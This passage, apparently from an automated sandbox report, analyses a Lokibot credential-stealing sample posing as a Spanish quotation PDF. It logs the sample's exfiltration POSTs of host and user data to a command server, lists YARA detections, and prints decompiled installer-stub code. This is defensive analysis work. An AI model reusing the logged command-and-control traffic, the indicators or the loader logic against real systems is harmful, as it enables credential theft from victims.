Jan 14, 2022 17:28:26.366882086 CET	1241	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:25 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49766	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:27.825342894 CET	1242	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:27.956700087 CET	1242	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:28.095748901 CET	1242	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:27 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49767	104.223.93.105	80	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 17:28:29.267836094 CET	1243	OUT	POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 165 Connection: close
Jan 14, 2022 17:28:29.398169041 CET	1244	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 Data Ascii: (ckav.rualfons642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jan 14, 2022 17:28:29.534789085 CET	1244	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 16:28:28 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Cotizaci#U00f3npdf.exe PID: 2604 Parent PID: 6128

General

Start time:	17:28:04
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
Imagebase:	0x400000
File size:	251901 bytes
MD5 hash:	3FE29E21698212A70E03144BB4979632
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Cotizaci#U00f3npdf.exe PID: 2512 Parent PID: 2604

General

Start time:	17:28:05
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
Imagebase:	0x400000
File size:	251901 bytes
MD5 hash:	3FE29E21698212A70E03144BB4979632
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Cotizaci#U00f3npdf.exe PID: 2604 Parent PID: 6128 Cotizaci#U00f3npdf.exeCOMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	6.2%
Signature Coverage:	22.4%
Total number of Nodes:	1328
Total number of Limit Nodes:	25

Executed Functions

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\alfons\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\alfons\\AppData\\Local\\Temp", "C:\\Users\\alfons\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\Cotizaci#U00f3npdf.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32(C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,0041F050,00000001), ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32 ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

SeShutdownPrivilege, xrefs: 00403553
1033, xrefs: 00403393
NCRC, xrefs: 00403311
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 00403299, 0040329F, 004033B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe, xrefs: 004034BA
Error launching installer, xrefs: 004033CE
~nsu.tmp, xrefs: 0040343C
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
NSIS Error, xrefs: 00403284
_?=, xrefs: 004033BF
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
", xrefs: 004032F3
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 0040346F
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
\Temp, xrefs: 0040337F
/D=, xrefs: 00403327

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-725319056
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
